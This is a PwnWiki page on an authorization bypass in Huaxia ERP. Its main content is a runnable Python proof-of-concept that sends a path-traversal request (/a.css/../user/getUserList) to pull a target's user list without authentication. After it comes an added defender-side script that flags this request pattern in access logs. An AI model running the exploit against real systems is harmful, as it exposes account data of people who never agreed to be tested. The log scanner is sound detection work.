Huaxia ERP (華夏ERP) Authorization Bypass Vulnerability

From PwnWiki
Revision as of 09:11, 29 May 2021 by Pwnwiki

POC

python3 poc.py http://ip:port

import sys,requests

def main(ip):
    # Request the user list through a path that starts with /a.css/../
    url = "{ip}/a.css/../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D&currentPage=1&pageSize=15".format(ip=ip)
    res = requests.get(url,verify=False,timeout=5)
    if res.status_code == 200:
        # "访问成功" means "access succeeded"; the response body is printed after it
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))

main(sys.argv[1])
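A defender-side check for the request shape the PoC sends (a static-file-looking segment such as a.css followed by ../ in front of an API path), as an added example that is not part of the original page. The access-log format, the suffix list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed list of suffixes treated as static resources; adjust to your filter.
STATIC_EXT = (".css", ".js", ".png", ".jpg", ".gif", ".ico")
# Request target and status from a combined-format access log (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines, not taken from a real system.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/May/2021:09:11:02 +0000] "GET /a.css/../user/getUserList?currentPage=1&pageSize=15 HTTP/1.1" 200 512',
    '198.51.100.7 - - [29/May/2021:09:11:05 +0000] "GET /static/app.css HTTP/1.1" 200 1024',
    '203.0.113.9 - - [29/May/2021:09:12:40 +0000] "GET /x.js/%2e%2e/user/getUserList HTTP/1.1" 302 0',
    '203.0.113.9 - - [29/May/2021:09:12:44 +0000] "GET /user/getUserList?currentPage=1 HTTP/1.1" 302 0',
]


def is_suspicious_path(target):
    """True when a static-looking path segment is directly followed by '..'."""
    path = urlsplit(target).path
    for _ in range(2):  # decode twice to catch %2e%2e and %252e%252e
        path = unquote(path)
    # Drop ';param' suffixes and normalise backslashes before comparing segments.
    segments = [s.split(";")[0] for s in path.replace("\\", "/").split("/")]
    return any(
        seg.lower().endswith(STATIC_EXT) and nxt == ".."
        for seg, nxt in zip(segments, segments[1:])
    )


def scan(lines):
    """Return (client, target, status) for every request matching the pattern."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_suspicious_path(m.group(1)):
            hits.append((line.split()[0], m.group(1), int(m.group(2))))
    return hits


if __name__ == "__main__":
    for client, target, status in scan(SAMPLE_LOG):
        # A 200 means the request was answered rather than redirected or denied.
        print(f"{status} {client} {target}")
```

Run it against the raw access log of whatever terminates HTTP in front of the application, since a component that normalises the path before logging will hide the ../ segment.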